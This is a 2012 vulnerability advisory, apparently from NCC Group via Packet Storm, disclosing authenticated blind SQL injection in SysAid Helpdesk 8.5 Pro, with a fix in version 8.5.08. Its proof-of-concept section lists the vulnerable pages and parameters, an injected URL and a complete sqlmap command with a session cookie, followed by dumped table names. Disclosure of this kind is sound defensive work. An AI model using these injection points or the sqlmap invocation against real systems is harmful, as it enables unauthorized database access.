SysAid Helpdesk 8.5 Pro SQL Injection

2012-11-30T00:00:00
ID PACKETSTORM:118500
Type packetstorm
Reporter Daniel Compton
Modified 2012-11-30T00:00:00

Description

                                        
                                            `=======  
Summary  
=======  
Name: SysAid Helpdesk Pro - Blind SQL Injection  
Release Date: 30 November 2012  
Reference: NGS00241  
Discoverer: Daniel Compton <daniel.compton@ngssecure.com>  
Vendor: SysAid  
Vendor Reference:   
Systems Affected: SysAid Helpdesk 8.5 Pro  
Risk: High  
Status: Published  
  
========  
TimeLine  
========  
Discovered: 12 March 2012  
Released: 12 March 2012  
Approved: 12 March 2012  
Reported: 14 March 2012  
Fixed: 1 August 2012  
Published: 30 November 2012  
  
===========  
Description  
===========  
SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.  
  
I. VULNERABILITY  
-------------------------  
SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.  
  
II. BACKGROUND  
-------------------------  
SyAid is a fully web based helpdesk solution.  
  
http://www.ilient.com/  
  
III. DESCRIPTION  
-------------------------  
SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.  
  
  
=================  
Technical Details  
=================  
IV. PROOF OF CONCEPT  
-------------------------  
  
The following URL and parameters have been confirmed to suffer from Blind SQL injection.  
  
/AssetManagementList.jsp (GET Parameter: computerID, group1)  
AssetManagementChart.jsp (GET Parameter: group1)  
/genericreport (POST Parameter: assetID, customSQL, groupFilter)  
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)  
  
/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices  
  
python sqlmap.py  
--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"  
--dbms=mysql -p computerID  
--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5  
  
  
Database: ilient [10 tables]   
+-----------------------+   
| account |   
| agreement |   
| asset2ci |   
| asset_catalog |   
| asset_catalog_files |   
| asset_catalog_history |   
| asset_catalog_links |   
| asset_data_day_data |   
| asset_data_month_data |   
| asset_data_week_data |  
+-----------------------+  
  
===============  
Fix Information  
===============  
Fixed in version 8.5.08  
  
http://www.sysaid.com/bugs-fixed-8-5.htm#8508  
  
Download Product Patch:  
  
http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe  
  
NCC Group Research  
http://www.nccgroup.com/research  
  
  
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>  
This email message has been delivered safely and archived online by Mimecast.  
</a>  
`